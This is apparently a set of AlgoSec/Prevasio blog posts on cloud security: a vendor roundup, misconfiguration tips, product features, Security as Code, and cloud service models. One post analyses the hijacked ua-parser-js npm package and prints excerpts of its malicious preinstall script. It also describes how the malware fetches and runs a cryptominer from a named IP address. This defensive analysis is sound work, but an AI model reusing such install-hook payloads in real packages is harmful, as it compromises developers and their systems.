Google-centric workflows. 5. IBM Cloud Pak for Security IBM’s cloud security service connects disparate data sources across hybrid and multi-cloud environments to uncover hidden threats. It allows hybrid organizations to advance Zero Trust strategies without compromising on operational security. IBM provides its customers with AI-driven insights, seamless integrations with existing IT environments, and data protection capabilities. It’s especially well-suited for enterprise organizations that want to connect public cloud services with legacy technology deployments that are difficult or expensive to modify. Key Features : Open security. This platform is designed to integrate easily with existing security applications, making it easy for customers to scale their security tech stack and improve policy standards across the enterprise. Improved data stewardship. IBM doesn’t require customers to move their data from one place to another. This makes compliance much easier to manage, especially in complex enterprise environments. Threat intelligence integrations. Customers can integrate IBM Cloud Pak with IBM Threat Intelligence Insights to get detailed and actionable insights delivered to cloud security teams. What Do People Say About IBM Cloud Pak? IBM Cloud Pak helps connect security teams and administrators to the content they need in real time. However, it’s a complicated environment with a significant amount of legacy code, well-established workarounds, and secondary components. This impacts usability and makes it less accessible than other entries on this list. 6. Palo Alto Networks Prisma Cloud Palo Alto Networks offers comprehensive cloud-native security across multi-cloud and hybrid environments to customers. Prisma Cloud reduces risk and prevents security breaches at multiple points in the application lifecycle. Some of the key features this solution includes are continuous monitoring, API security, and vulnerability management. It provides comprehensive visibility and control to security leaders managing extensive hybrid cloud deployments. Key Features: Hardens CI/CD pipelines. This solution includes robust features for reducing the attack surface of application development environments and protecting CI/CD pipelines. Secures infrastructure-as-code (IaC) deployments. Extensive coverage for detecting and resolving misconfigurations in IaC templates like Terraform, Kubernetes, ARM, and CloudFormation. Provides context-aware prioritization. Palo Alto Networks addresses open source vulnerabilities and license compliance problems contextually, bringing attention to the most important issues first. What Do People Say About Palo Alto Networks Prisma Cloud? Palo Alto Networks is highly regarded as an enterprise security leader. Many customers praise its products, and Prisma Cloud is no different. However, it comes with a very high price tag that many organizations simply can’t afford. This is especially true when additional integration and implementation costs are factored in. Additionally, some customers have complained about the lack of embedded Identity and Access Management (IAM) controls in the solution. Optimize Hybrid Cloud Security with AlgoSec Security leaders must continually adapt their security deployments to meet evolving cybersecurity threats in hybrid cloud environments. As the threat landscape changes, the organization’s policies and capabilities must adjust to meet new demands. Achieving this level of flexibility is not easy with purely manual configuration and policy workflows. Human error is a major element in many data breaches, and organizations must develop security best practices that address that risk. Implementing the right cloud security platform can make a significant difference when it comes to securing complex hybrid cloud deployments. The ability to simulate in-depth configuration changes and automate the deployment of those changes across the entire environment offers significant advantages to operational security. Consider making AlgoSec your cybersecurity co-pilot for identifying vulnerabilities and addressing security gaps. Avoid costly misconfigurations and leverage intelligent automation to make your hybrid cloud environment more secure than ever before. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package... Cloud Security Hijacked NPM Account Leads to Critical Supply Chain Compromise Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/21 Published As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don’t realize something was up, luckily the effect is quite the contrary). I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0 I have sent a message to NPM support since I can’t seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish ) so I can only deprecate them with a warning message. There are more than 2.5 million other repositories that depend on ua-parser-js . Google search “file:ua-parser-js.js” reveals nearly 2 million websites, which indicates the package is popular. As seen in the source code diff , the newly added file package/preinstall.js will check the OS platform. If it’s Windows, the script will spawn a newly added preinstall.bat script. If the OS is Linux, the script will call terminalLinux() function, as seen in the source below: var opsys = process.platform; if ( opsys == "darwin" ) { opsys = "MacOS" ; } else if ( opsys == "win32" || opsys == "win64" ) { opsys = "Windows" ; const { spawn } = require ( 'child_process' ) ; const bat = spawn ( 'cmd.exe' , [ '/c' , 'preinstall.bat' ]) ; } else if ( opsys == "linux" ) { opsys = "Linux" ; terminalLinux () ; } The terminalLinux() function will run the newly added preinstall.sh script. function terminalLinux(){ exec( "/bin/bash preinstall.sh" , (error, stdout, stderr) => { ... }); } The malicious preinstall.sh script first queries an XML file that will report the current user’s geo-location by visiting this URL . For example, for a user located in Australia, the returned content will be: [IP_ADDRESS] AU Australia ... Next, the script searches for the presence of the following country codes in the returned XML file: RU UA BY KZ That is, the script identifies if the affected user is located in Russia, Ukraine, Belarus, or Kazakhstan. Suppose the user is NOT located in any of these countries. In that case, the script will then fetch and execute malicious ELF binary jsextension from a server with IP address 159.148.186.228, located in Latvia. jsextension binary is an XMRig cryptominer with reasonably good coverage by other AV products. Conclusion The compromised ua-parser-js is a showcase of a typical supply chain attack. Last year, Prevasio found and reported a malicious package flatmap-stream in 1,482 Docker container images hosted in Docker Hub with a combined download count of 95M. The most significant contributor was the trojanized official container image of Eclipse. What’s fascinating in this case, however, is the effectiveness of the malicious code proliferation. It only takes one software developer to ignore a simple trick that reliably prevents these things from happening. The name of this trick is two-factor authentication (2FA). About the Country Codes Some people wonder why cybercriminals from Russia often avoid attacking victims outside of their country or other Russian-speaking countries. Some go as far as suggesting it’s for their own legal protection. The reality is way simpler, of course: “Не гадь там, где живешь” “Не сри там, где ешь” “Не плюй в колодец, пригодится воды напиться” Polite translation of all these sayings is: “One should not cause trouble in a place, group, or situation where one regularly finds oneself.” Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Cloud misconfigurations can cause devastating financial and reputational damage to organizations. Yet, such undesirable circumstances can... Cloud Security Top 5 Tips on Avoiding Cloud Misconfigurations Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/24/22 Published Cloud misconfigurations can cause devastating financial and reputational damage to organizations. Yet, such undesirable circumstances can be avoided by understanding common misconfiguration errors and mitigating them before malicious actors can exploit them. Ava Chawla, AlgoSec’s Global Head of Cloud Security provides some valuable insights on cloud misconfigurations and offers useful tips on how to avoid them It may come as a surprise to some, but did you know that misconfigurations were the #1 cause of cloud-security incidents in 2021 and were also responsible for 65-70% of cloud-security challenges in 2020? Cloud Misconfigurations: The Insidious yet Serious Threat Clearly, misconfigurations are a common cause of security loopholes. These security loopholes – usually the result of oversights, errors, or poor configuration choices by inexperienced or careless users – often result in cyberattacks and the exposure of mission-critical information. Most cloud environments are saturated with misconfigurations, with 99% of them going unseen. As a result, they become vulnerable to many cyberthreats, including malware, ransomware, and insider threats. Threat actors may also exploit the vulnerabilities caused by misconfigurations to access enterprise networks, compromise assets, or exfiltrate sensitive data. So why are cloud misconfigurations such a serious threat in cloud environments? And, how can your organization avoid these errors and keep your cloud environment safe from the bad guys? Jarring Data Breaches Resulting from Cloud Misconfigurations: More than Food for Thought In 2018 and 2019 , misconfigurations caused hundreds of data breaches that cost companies a whopping $5 trillion. Threat actors also took advantage of misconfigurations to attack many organizations in 2020. An exposed database is a perfect example of how misconfiguration errors like forgetting to password-protect critical cloud assets can create huge security risks for companies. In early 2020, a database belonging to cosmetics giant Estée Lauder that contained over 440 million records ended up online – all because it was not password-protected. How bad was this oversight? It allowed malicious actors to access its sensitive contents, such as email addresses, middleware records, references to internal documents, and information about company IP addresses and ports. And misconfiguration-related breaches didn’t stop in 2021. In May of that year, Cognyte left a database unsecured, leading to the online exposure of 5 billion records, including names, passwords, and email addresses. The incident is particularly ironic because Cognyte is a cyber-intelligence service that alerts users to potential data breaches. So how can your organization avoid suffering the same fates as Estée Lauder and Cognyte? By preventing misconfiguration errors. How to Eliminate Common Misconfiguration Errors? 1) One of the most common cloud misconfiguration errors is not implementing monitoring . A failure to monitor the cloud environment creates huge security risks because the organization can’t even know that there’s a threat, much less mitigate it. Solution: By integrating monitoring and logging tools into your entire cloud estate, you can keep an eye on all the activity happening within it. More importantly, you can identify suspicious or malicious actions, and act early to mitigate threats and prevent serious security incidents. An example of a monitoring tool is CloudTrail in the AWS Cloud. 2) The second-biggest misconfiguration risk stems from overly permissive access settings. Enterprise teams frequently forget to change the default settings or make the settings overly-permissive, resulting in critical assets being exposed to the Internet and to threat actors lurking in cyberspace. 3) Another misconfiguration mistake is mismanaging identity and access management (IAM) roles and permissions. Unrestricted access, particularly admin-level access, significantly increases the probability of breaches. The compromise of this user could allow a malicious actor to exploit the entire network and its sensitive data. 4) Mismanaged secrets are another common misconfiguration mistake that can lead to attacks and breaches. Secrets like passwords, API keys, encryption keys, and access tokens are the keys to your (cloud) kingdom, and their compromise or theft can severely damage your enterprise. Solution: You can avoid mistakes #2, #3 and #4 by granting least-privilege access (also known as the principle of least privilege) and implementing detailed security policies, standards, and procedures for IAM, secrets management, remote access, etc. 5) The fifth misconfiguration error is not patching vulnerabilities. Patch management pitfalls include pushing out updates too quickly and devices going offline. But the most significant risk when patch management doesn’t take place, not surprisingly, is leaving a system vulnerable to malicious actors. Solution: Proactively scanning your cloud environment is vital to find the vulnerabilities that can be exploited by threat actors to elevate their privileges in your network and execute remote attacks. Conclusion and Next Steps Cloud misconfigurations are the most common cause of security incidents in the cloud. Fortunately, most of them are avoidable. If you’ve found this action-packed guide a valuable read, then you’re on the right path to reaching a solution that includes protecting your most valuable assets, securing the connectivity of your most critical business applications, and streamlining the management of your entire multi cloud environment. Prevasio can help you get there faster. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

With expertise in data management, search algorithms, and AI, Google has created a cloud platform that excels in both performance and... Hybrid Cloud Security Management Improve visibility and identify risk across your Google Cloud environments with AlgoSec Cloud Joseph Hallman 2 min read Joseph Hallman Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 9/12/23 Published With expertise in data management, search algorithms, and AI, Google has created a cloud platform that excels in both performance and efficiency. The advanced machine learning, global infrastructure, and comprehensive suite of services available in Google Cloud demonstrates Google’s commitment to innovation. Many companies are leveraging these capabilities to explore new possibilities and achieve remarkable outcomes in the cloud. When large companies decide to locate or move critical business applications to the cloud, they often worry about security. Making decisions to move certain applications to the cloud should not create new security risks. Companies are concerned about things like hackers getting access to their data, unauthorized people viewing or tampering with sensitive information, and meeting compliance regulations. To address these concerns, it’s important for companies to implement strong security measures in the cloud, such as strict access controls, encrypting data, constantly monitoring for threats, and following industry security standards. Unfortunately, even with the best tools and safeguards in place it is hard to protect against everything. Human error plays a major part in this and can introduce threats with a few small mistakes in configuration files or security rules that can create unnecessary security risks. The CloudFlow solution from AlgoSec is a network security management solution designed for cloud environments. It provides clear visibility, risk analysis, and helps identify unused rules to help with policy cleanup across multi-cloud deployments. With CloudFlow, organizations can manage security policies, better understand risk, and enhance their overall security in the cloud. It offers centralized visibility, helps with policy management, and provides detailed risk assessment. With Algosec Cloud, and support for Google Cloud, many companies are gaining the following new capabilities: Improved visibility Identifying and reduce risk Generating detailed risk reports Optimizing existing policies Integrating with other cloud providers and on-premise security devices Improve overall visibility into your cloud environments Gain clear visibility into your Google Cloud, Inventory, and network risks. In addition, you can see all the rules impacting your Google Cloud VPCs in one place. View network and inherited policies across all your Google Cloud Projects in one place. Using the built-in search tool and filters it is easy to search and locate policies based on the project, region, and VPC network. View all the rules protecting your Google Cloud VPCs in one place. View VPC firewall rules and the inherited rules from hierarchical firewall policies Gain visibility for your security rules and policies across all of your Google Cloud projects in one place. Identify and Reduce Risk in your Cloud Environments CloudFlow includes the ability to identify risks in your Google Cloud environment and their severity. Look across policies for risks and then drill down to look at specific rules and the affected assets. For any rule, you can conveniently view the risk description, the risk remediation suggestion and all its affected assets. Quickly identify policies that include risk Look at risky rules and suggested remediation Understand the assets that are affected Identify risky rules so you can confidently remove them and avoid data breaches. Tip: Hover over the: Description icon : to view the risk description. Remediation icon: to view the remediation suggestion. Quickly create and share detailed risk reports From the left menu select Risk and then use the built-in filters to narrow down your selection and view specific risk based on cloud type, account, region, tags, and severity. Once the selections are made a detailed report can be automatically generated for you by clicking on the pdf report icon in the top right of the screen. Generate detailed risk reports to share in a few clicks. Optimize Existing Policies Unused rules represent a common security risk and create policy bloat that can complicate both cloud performance and connectivity. View unused rules on the Overview page, for each project you can see the number of Google Cloud rules not being used based on a defined analysis period. This information can assist in cleaning the policies and reducing the attack surface. Select analysis period Identify unused rule to help optimize your cloud security policies Quickly locate rules that are not in use to help reduce your attack surface. Integrate with other cloud providers and on-premise security devices Manage Google Cloud projects, other cloud solutions, and on-premise firewall devices by using AlgoSec Cloud along with the AlgoSec Security Management Suite (ASMS). Integrate with the full suite of solutions from AlgoSec for a powerful and comprehensive way to manage applications connectivity across your entire hybrid environment. CloudFlow plus ASMS provides clear visibility, risk identification, and other capabilities across large complex hybrid networks. Resources- Quick overview video about CloudFlow and Google Cloud support For more details about AlgoSec Security Management Suite or to schedule a demo please visit- www.algosec.com Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Did you know that in 2023, the average data breach cost companies a whopping $4.45 million ? Ouch! And with development cycles spinning... Cloud Security How to Implement a Security-as-Code Approach Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/18/24 Published Did you know that in 2023, the average data breach cost companies a whopping $4.45 million ? Ouch! And with development cycles spinning faster than a hyper-caffeinated hamster, those risks are only multiplying. So how do you keep security from becoming a costly afterthought in this high-speed race? Enter Security as Code (SaC) – your secret weapon for weaving security into the very fabric of your development process. Think of it as baking security into your code like chocolate chips in a cookie – it's part of the recipe from the start, not just a sprinkle on top. SaC isn't just about writing squeaky-clean code; it's about automating, version-controlling, and consistently applying your security policies and checks across your entire development lifecycle. It's like having an army of security experts reviewing every line of code, every configuration, and every deployment, ensuring nothing slips through the cracks. And the best part? SaC helps you catch those pesky vulnerabilities early on, shrinking your attack surface and saving you a mountain of cash in the long run. It's like spotting a pothole before you drive into it – a little fix now saves you a major headache (and repair bill) later. Why Security as Code is Your Cloud's Best Friend Traditionally, security was treated like an unwelcome guest, showing up late to the party and trying to clean up the mess. But in today's fast-paced world, that approach is about as effective as a screen door on a submarine. SaC flips the script, making security an integral part of the development process from day one. It's like having a security guard at every checkpoint, ensuring that only the good guys get through. Here's why SaC is a game-changer for your cloud security: Early Threat Detection: Catch those vulnerabilities early on, when they're easier and cheaper to fix. It's like spotting a termite infestation before your entire house collapses. Boosted Visibility: Integrate security checks into every stage of your development lifecycle, leaving no room for those sneaky vulnerabilities to hide. Think of it as having X-ray vision for your code. Automated Enforcement: Say goodbye to manual errors and inconsistencies. SaC automates your security checks and enforcement, ensuring everything is locked down tight. It's like having a tireless robot army enforcing your security rules 24/7. Supercharged Efficiency: Streamline your development process and free up your team to focus on what they do best – building awesome applications. SaC is like giving your developers a jetpack, allowing them to soar through the development process without getting bogged down in security headaches. Compliance Confidence: Meet those pesky compliance requirements with ease. SaC helps you automate compliance checks and ensure your applications are always playing by the rules. It's like having a compliance officer built into your development process, keeping you on the straight and narrow. Taming the SaC Beast: Conquering the Challenges Okay, so SaC sounds awesome, right? But let's be real, change can be scarier than a clown holding a chainsaw. Many organizations hit a few roadblocks when trying to implement SaC. But fear not, cloud crusaders, we're here to help you conquer those challenges like a boss! Challenge #1: The Learning Curve The Problem: Switching to SaC can feel like learning to ride a unicycle on a tightrope – intimidating, to say the least. Your team might not be familiar with weaving security directly into their code. The Solution: Start small, like adding training wheels to that unicycle. Integrate those essential automated security tools (SAST, DAST) into your CI/CD pipeline. These tools deliver instant value and help your team get comfy with security checks early on. Empower your team with hands-on training and workshops, and cultivate those security champions within your dev teams to spread the SaC gospel. Challenge #2: The Price Tag The Problem: Adopting SaC requires an investment in tools, training, and tweaking your processes. It's like upgrading your security system – it costs some coin upfront, but it saves you a fortune in the long run. The Solution: Think long-term, my friend. The savings from dodging breaches, speeding up development, and automating compliance will make that initial investment look like peanuts. Start small and scale up as you go. Begin with open-source tools or pilot SaC in smaller projects before unleashing it across your entire organization. Challenge #3: Resistance to Change The Problem: Change can be tougher than convincing a cat to take a bath. Developers might worry that SaC will slow them down or cramp their style. The Solution: Rally the troops! Highlight the benefits of SaC – faster releases, fewer last-minute fire drills, and smoother compliance. Share success stories that show how SaC actually makes development better , not slower. And most importantly, communicate clearly. Make sure everyone understands why you're adopting SaC and how it benefits the entire team. Challenge #4: Integration Hiccups The Problem: Integrating SaC into your existing CI/CD pipeline can feel like trying to fit a square peg into a round hole. The Solution: Start small and expand gradually. Begin by automating security checks at critical points in your development cycle, then add more as your team gets comfortable. Focus on those positive outcomes and ensure a smooth transition that enhances your workflow, not disrupts it. SaC in Action: Real-World Wins Don't just take our word for it – check out these real-world examples of how SaC is helping companies across different industries boost their security and efficiency: Financial Services: DMI Finance was drowning in manual security processes for their Salesforce platform. By embracing SaC, they streamlined their workflow, boosted their security, and supercharged their deployments by a whopping 133%! Talk about a win-win! Healthcare: Athenahealth , a healthcare giant serving over 110 million patients, needed to scale securely while keeping those HIPAA compliance wolves at bay. They chose SaC with Okta for identity and access management, ensuring secure patient data and streamlined user authentication. Even during the chaos of COVID-19, they emerged as a leader in secure, scalable healthcare infrastructure. Retail: Swiss sportswear brand On was facing a barrage of credential-based attacks. They fought back by adopting SaC and implementing best practices like least privilege, fortifying their security posture and protecting their customers' data. These success stories prove that SaC isn't just a buzzword – it's a powerful tool that helps organizations across all industries squash vulnerabilities, automate compliance, and streamline their operations. SaC Implementation: Your Step-by-Step Guide Ready to roll up your sleeves and implement SaC in your own development lifecycle? First things first, planning is key. Define those security requirements like your life depends on it. Threat analysis time, people! Gather your team, brainstorm those potential vulnerabilities, and lock down your defenses before you write a single line of code. Next up, design like a security ninja. Threat modeling is your secret weapon. Embrace secure design principles like they're your own personal commandments. And don't forget to plan for security testing – you'll thank me later. Now, let's get coding, but securely, of course. Stick to those secure coding standards like glue. Embrace automated code analysis tools – they're your digital code whisperers. Vet those third-party libraries like you're hiring a bodyguard. And for the love of all that is secure, don't skip those code reviews! Testing time! Automate everything you can. Fuzz testing, security regression testing – bring it on! (Insert Figure 2 here, because visuals are awesome!) Deployment is where the rubber meets the road. Scan that infrastructure as code (IaC) like a hawk. Validate those container images like your life depends on it. And lock down those access controls tighter than a drum. Finally, maintenance is the name of the game. Continuous monitoring is your 24/7 security guard. Keep those patches and updates flowing like a well-oiled machine. And don't forget those regular security audits – they're your security checkup, keeping your system healthy and strong. Boom! You've just implemented SaC like a boss. For a full checklist of SaC implementation, download our checklist : Security as Code Checklist: Download Your Free Copy Want a handy guide to keep track of all the essential SaC practices? Download our free checklist and ensure you're covering all the bases! Download Checklist Now! SaC Adoption: Start Small, Dream Big Implementing SaC might seem daunting, but remember, even the mightiest oak tree starts as a tiny seed. Start small, build gradually, and foster that security-first mindset within your team. It's like training your knights to be vigilant and always ready for battle. Begin by educating your teams on security best practices and gradually integrating those security tools and practices into your SDLC. Start with automated security testing tools like SAST and DAST, and build from there. Regularly review and optimize your security policies and procedures to ensure they're always sharp and ready to defend your cloud kingdom. Conclusion: SaC – Your Ticket to a Secure and Agile Cloud Security as code is no longer a nice-to-have; it's a must-have in today's fast-paced development world. By integrating security from the get-go, you can squash vulnerabilities, ensure compliance, and accelerate your development timelines. SaC is all about shared responsibility, empowering your teams to proactively tackle risks and build trust with your users and stakeholders. And hey, don't forget to grab your free Security as Code Checklist to make sure you're covering all your bases! Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Knowing how to select and position security capabilities in different cloud deployment models is critical to comprehensive security... Cloud Security Understanding Security Considerations in IaaS/PaaS/SaaS Deployments Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/24/22 Published Knowing how to select and position security capabilities in different cloud deployment models is critical to comprehensive security across your organization. Implementing the right pattern allows you to protect the confidentiality, integrity, and availability of cloud data assets. It can also improve incident response to security threats. Additionally, security teams and cloud security architects no longer have to rely on pre-set security templates or approaches built for on-premises environments. Instead, they must adapt to the specific security demands of the cloud and integrate them with the overall cloud strategy. This can be accomplished by re-evaluating defense mechanisms and combining cloud-native security and vendor tools. Here, we’ll break down the security requirements and best practices for cloud service models like IaaS, PaaS, and SaaS. Do you have cloud security architects on board? We’ll also cover their roles and the importance of leveraging native security tools specific to each model. Managing Separation of Responsibilities with the Cloud Service Provider Secure cloud deployments start with understanding responsibilities. Where do you stand, and what is expected of you? There are certain security responsibilities the cloud security provider takes care of and those that the customer handles. This division of responsibilities means adjusting focus and using different measures to ensure security is necessary. Therefore, organizations must consider implementing compensating controls and alternative security measures to make up for any limitations in the cloud service provider’s security offerings. Security Considerations for SaaS (Software-as-a-Service) Deployments The specific security requirements in SaaS deployments may vary between services. However, it’s important to consider the following areas: Data protection During cloud deployments, protecting data assets is a tough nut to crack for many organizations. As a SaaS provider, ensuring data protection is crucial because you handle and store sensitive customer data. Encryption must be implemented for data in transit and at rest. Protecting data at rest is the cloud provider’s responsibility, whereas you are responsible for data in transit. The cloud provider implements security measures like encryption, access controls, and physical security to protect the data stored in their infrastructure. On the other hand, it’s your responsibility to implement secure communication protocols like encryption, ensuring data remains protected when it moves between your SaaS application. Additionally, best practice solutions may offer you the option of managing your encryption keys so that cloud operations staff cannot decrypt customer data. Interfacing with the Cloud Service There are a number of security considerations to keep in mind when interacting with a SaaS deployment. These include validating data inputs, implementing secure APIs, and securing communication channels. It’s crucial to use secure protocols like HTTPS and to ensure that the necessary authentication and authorization mechanisms are in place. You may also want to review and monitor access logs frequently to spot and address any suspicious activity. Application Security in SaaS During SaaS deployments, it’s essential to ensure application security. For instance, secure coding practices, continuous vulnerability assessments, and comprehensive application testing all contribute to effective SaaS application security. Cross-site scripting (XSS) and SQL injection are some of the common web application cyber-attacks today. You can improve the application’s security posture by implementing the right input validation, regular security patches from the SaaS provider, and web application firewalls (WAFs). Cloud Identity and Access Controls Here, you must define how cloud services will integrate and federate with existing enterprise identity and access management (IAM) systems. This ensures a consistent and secure access control framework. Implementing strong authentication mechanisms like multifactor authentication (MFA) and enforcing proper access controls based on roles and responsibilities are necessary security requirements. You should also consider using Cloud Access Security Broker (CASB) tools to provide adaptive and risk-based access controls. Regulatory Compliance Using a cloud service doesn’t exempt one from regulatory compliance, and cloud architects must design the SaaS architecture to align with these requirements. But why are these stringent requirements there in the first place? The purpose of these regulations is to protect consumer privacy by enforcing confidentiality, integrity, availability, and accountability. So, achieving compliance means you meet these regulations. It demonstrates that your applications and tech stack maintain secure privacy levels. Failure to comply could cost money in the form of fines, legal action, and a damaged reputation. You don’t want that. Security Considerations for PaaS (Platform-as-a-Service) Deployments PaaS security considerations during deployments will address all the SaaS areas. But as a PaaS customer, there are slight differences you should know. For example, more options exist to configure how data is protected and who can do what with it. As such, the responsibility of user permissions may be given to you. On the other hand, some PaaS providers may have built-in tools and mechanisms for managing user permissions. So, what are the other key areas you want to address to ensure a secure environment for PaaS deployments? We’ll start with the application security. Application Security The customer is responsible for securing the applications they build and deploy on the PaaS platform. Securing application platforms is necessary, and cloud architects must ensure this from the design and development stage. So, what do you do to ensure application security? It all starts from the onset. From secure coding practices, addressing application vulnerabilities, and conducting regular security testing. You’ll often find that most security vulnerabilities are introduced from the early stages of software development. If you can identify and fix potential flaws using penetration testing and threat modeling practices, you’re on your way to successful deployment. Data Security PaaS cloud security deployments offer more flexibility and allow customers control over their data and user entitlements. What this means is you can build and deploy your own applications on the platform. You can configure security measures and controls within your applications by defining who has access to applications, what they can do, and how data is protected. Here, cloud security architects and security teams can ensure data classification and access controls, determining appropriate encryption keys management practices, secure data integration and APIs, and data governance. Ultimately, configuring data protection mechanisms and user permissions provides customers with greater customization and control. Platform Security The platform itself, including the operating system, underlying infrastructure, data centers, and middleware, need to be protected. This is the responsibility of the PaaS provider. They must ensure that the components that keep the platform up are functional at all times. Network Security In PaaS environments, identity and roles are primarily used for network security to determine access to resources and data in the PaaS platform. As such, the most important factor to consider in this case is verifying the user identity and managing access based on their roles and permissions. Rather than relying on traditional network security measures like perimeter controls, IDS/IPS, and traffic monitoring, there is a shift to user-centric access controls. Security Considerations for IaaS (Infrastructure-as-a-Service) Cloud Deployments When it comes to application and software security, IaaS security during cloud deployment is similar. If you’re an IaaS customer, there are slight differences in how IaaS cloud deployment is handled. For example, while the cloud provider handles the hypervisor or virtualized layer, everything else is the customers’ responsibility. So, you must secure the cloud deployment by implementing appropriate security measures to safeguard their applications and data. Due to different deployment patterns, some security tools that work well for SaaS may not be suitable for IaaS. For example, we discussed how CASB could be excellent for cloud identity, data, and access controls in SaaS applications. However, this may not be effective in IaaS environments. Your cloud architects and security teams must understand these differences when deploying IaaS. They should consider alternative or additional security measures in certain areas to ensure more robust security during cloud deployments. These areas are: Access Management IaaS deployment requires you to consider several identity and access management (IAM) dimensions. For example, cloud architects must consider access to the operating system, including applications and middleware installed on them. Additionally, they must also consider privileged access, such as root or administrative access at the OS level. Keep in mind that IaaS has additional access layers. These consist of access to the IaaS console and other cloud provider features that may offer insights about or impact the operation of cloud resources. For example, key management and auditing and resource configuration and hardening. It’s important to clarify who has access to these areas and what they can do. Regular Patching There are more responsibilities for you. The IaaS customer is responsible for keeping workloads updated and maintained. This typically includes the OS itself and any additional software installed on the virtual machines. Therefore, cloud architects must apply the same vigilance to cloud workloads as they would to on-premises servers regarding patching and maintenance. This ensures proactive, consistent, and timely updates that ensure the security and stability of cloud workloads. Network Security IaaS customers must configure and manage security mechanisms within their virtual networks. This includes setting firewalls, using intrusion detection and intrusion prevention systems (IDS/IPS), establishing secure connections (VPN), and network monitoring. On the other hand, the cloud provider ensures network security for the underlying network infrastructure, like routers and switches. They also ensure physical security by protecting network infrastructure from unauthorized access. Data Protection While IaaS providers ensure the physical security of data centers, IaaS customers must secure their own data in the IaaS environment. They need to protect data stored in databases, virtual machines (VMs), and any other storage system provisioned by the IaaS provider. Some IaaS providers, especially large ones, offer encryption capabilities for the VMs created on their platform. This feature is typically free or low-priced. It’s up to you to decide whether managing your own encryption keys is more effective or to choose the provider’s offerings. If you decide to go for this feature, it’s important to clarify how encrypting data at rest may affect other services from the IaaS provider, such as backup and recovery. Leveraging Native Cloud Security Tools Just like the encryption feature, some cloud service providers offer a range of native tools to help customers enforce effective security. These tools are available for IaaS, PaaS, and SaaS cloud services. While customers may decide not to use them, the low financial and operational impact of native cloud security tools on businesses makes them a smart decision. It allows you to address several security requirements quickly and easily due to seamless control integration. However, it’s still important to decide which controls are useful and where they are needed. Conclusion Cloud security architecture is always evolving. And this continuous change makes cloud environments more complex and dynamic. From misconfigurations to data loss, many challenges can make secure cloud deployments for IaaS, PaaS, and SaaS services more challenging. Prevasio, an AlgoSec company, is your trusted cloud security partner that helps your organization streamline cloud deployments. Our cloud-native application provides increased risk visibility and control over security and compliance requirements. Contact us now to learn more about how you can expedite your cloud security operations. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

